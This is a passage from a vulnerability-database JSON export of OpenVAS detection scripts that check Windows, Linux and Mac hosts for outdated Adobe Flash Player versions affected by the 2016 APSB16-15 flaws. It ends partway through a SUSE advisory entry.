"2020-05-14T00:00:00", "id": "OPENVAS:1361412562310810654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810654", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3157993)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810654\");\n script_version(\"2020-05-14T14:30:11+0000\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n \"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n \"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n \"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n \"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n \"CVE-2016-4117\", \"CVE-2016-4120\", \"CVE-2016-4121\", \"CVE-2016-4160\",\n \"CVE-2016-4161\", \"CVE-2016-4162\", \"CVE-2016-4163\");\n script_bugtraq_id(90620, 90621, 90505, 90619, 90618, 90617, 90616);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-14 14:30:11 +0000 (Thu, 14 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 14:50:56 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3157993)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS16-064.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to execute arbitrary code and\n also some unknown impact.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012/2012R2\n\n - Microsoft Windows 10 x32/x64\n\n - Microsoft Windows 10 Version 1511 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-064\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_flash_player_within_ie_edge_detect.nasl\");\n script_mandatory_keys(\"AdobeFlash/IE_or_EDGE/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012:1, win2012R2:1, win10:1,\n win10x64:1) <= 0)\n exit(0);\n\ncpe_list = make_list(\"cpe:/a:adobe:flash_player_internet_explorer\", \"cpe:/a:adobe:flash_player_edge\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\nif(path) {\n path += \"\\Flashplayerapp.exe\";\n} else {\n path = \"Could not find the install location\";\n}\n\nif(version_is_less(version:vers, test_version:\"21.0.0.242\")) {\n report = report_fixed_ver(file_checked:path, file_version:vers, vulnerable_range:\"Less than 21.0.0.242\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:19:13", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-18T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-4121", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-4120", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4163", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4160", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4162", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-4161", "CVE-2016-1099"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310810655", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810655", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Windows\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810655\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n \"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n \"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n \"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n \"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n \"CVE-2016-4117\", \"CVE-2016-4120\", \"CVE-2016-4121\", \"CVE-2016-4160\",\n \"CVE-2016-4161\", \"CVE-2016-4162\", \"CVE-2016-4163\");\n script_bugtraq_id(90620, 90621, 90505, 90619, 90618, 90617, 90616);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 14:56:27 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to execute arbitrary code and\n also some unknown impact.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 21.0.0.242 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 21.0.0.242 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"21.0.0.242\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.242\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:16:24", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-18T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-4121", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-4120", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4163", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4160", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4162", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-4161", "CVE-2016-1099"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310810657", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810657", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Linux\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810657\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n \"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n \"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n \"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n \"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n \"CVE-2016-4117\", \"CVE-2016-4120\", \"CVE-2016-4121\", \"CVE-2016-4160\",\n \"CVE-2016-4161\", \"CVE-2016-4162\", \"CVE-2016-4163\");\n script_bugtraq_id(90620, 90621, 90505, 90619, 90618, 90617, 90616);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 15:02:18 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Linux\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to execute arbitrary code and\n also some unknown impact.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 21.0.0.242 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 21.0.0.242 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/Lin/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"21.0.0.242\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.242\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:11:48", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-05-12T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates( apsa16-02 )-MAC OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-4121", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-4120", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4163", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4160", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4162", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-4161", "CVE-2016-1099"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310807699", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807699", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates( apsa16-02 )-MAC OS X\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807699\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n\t\t\"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n\t\t\"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n\t\t\"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n\t\t\"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n\t\t\"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n\t\t\"CVE-2016-4117\", \"CVE-2016-4120\", \"CVE-2016-4121\", \"CVE-2016-4160\",\n \"CVE-2016-4161\", \"CVE-2016-4162\", \"CVE-2016-4163\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-12 15:58:15 +0530 (Thu, 12 May 2016)\");\n script_name(\"Adobe Flash Player Security Updates( apsa16-02 )-MAC OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this\n vulnerability will allow remote attackers to execute arbitrary code and\n also some unknown impact.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 18.0.0.352 and 20.x before 21.0.0.242 on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 18.0.0.352, or 21.0.0.242, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"20\", test_version2:\"21.0.0.241\"))\n{\n fix = \"21.0.0.242\";\n VULN = TRUE;\n}\n\nelse if(version_is_less(version:playerVer, test_version:\"18.0.0.352\"))\n{\n fix = \"18.0.0.352\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:15:53", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-18T00:00:00", "type": "openvas", "title": "Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Mac OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1100", "CVE-2016-4121", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-4120", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4163", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4160", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4162", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-4161", "CVE-2016-1099"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310810656", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810656", "sourceData": "############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Mac OS X\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player_chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810656\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1096\", \"CVE-2016-1097\", \"CVE-2016-1098\", \"CVE-2016-1099\",\n \"CVE-2016-1100\", \"CVE-2016-1101\", \"CVE-2016-1102\", \"CVE-2016-1103\",\n \"CVE-2016-1104\", \"CVE-2016-1105\", \"CVE-2016-1106\", \"CVE-2016-1107\",\n \"CVE-2016-1108\", \"CVE-2016-1109\", \"CVE-2016-1110\", \"CVE-2016-4108\",\n \"CVE-2016-4109\", \"CVE-2016-4110\", \"CVE-2016-4111\", \"CVE-2016-4112\",\n \"CVE-2016-4113\", \"CVE-2016-4114\", \"CVE-2016-4115\", \"CVE-2016-4116\",\n \"CVE-2016-4117\", \"CVE-2016-4120\", \"CVE-2016-4121\", \"CVE-2016-4160\",\n \"CVE-2016-4161\", \"CVE-2016-4162\", \"CVE-2016-4163\");\n script_bugtraq_id(90620, 90621, 90505, 90619, 90618, 90617, 90616);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 15:02:10 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Adobe Flash Player Within Google Chrome Security Update (apsb16-15) - Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A buffer overflow vulnerability.\n\n - Multiple memory corruption vulnerabilities.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to execute arbitrary code and\n also some unknown impact.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player for chrome versions\n before 21.0.0.242 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player for chrome\n version 21.0.0.242 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_flash_player_within_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Chrome/MacOSX/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"21.0.0.242\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"21.0.0.242\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-17T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2016:1305-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1100", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1102", "CVE-2016-1026", "CVE-2016-1098", "CVE-2016-1021", "CVE-2016-4108", "CVE-2016-1019", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-1018", "CVE-2016-4117", "CVE-2016-1013", "CVE-2016-4116", "CVE-2016-1006", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-1023", "CVE-2016-4113", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-4112", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1106", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-1025", "CVE-2016-4115", "CVE-2016-1016", "CVE-2016-1105", "CVE-2016-1099", "CVE-2016-1015"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851312", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851312", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851312\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-17 13:40:35 +0200 (Tue, 17 May 2016)\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n 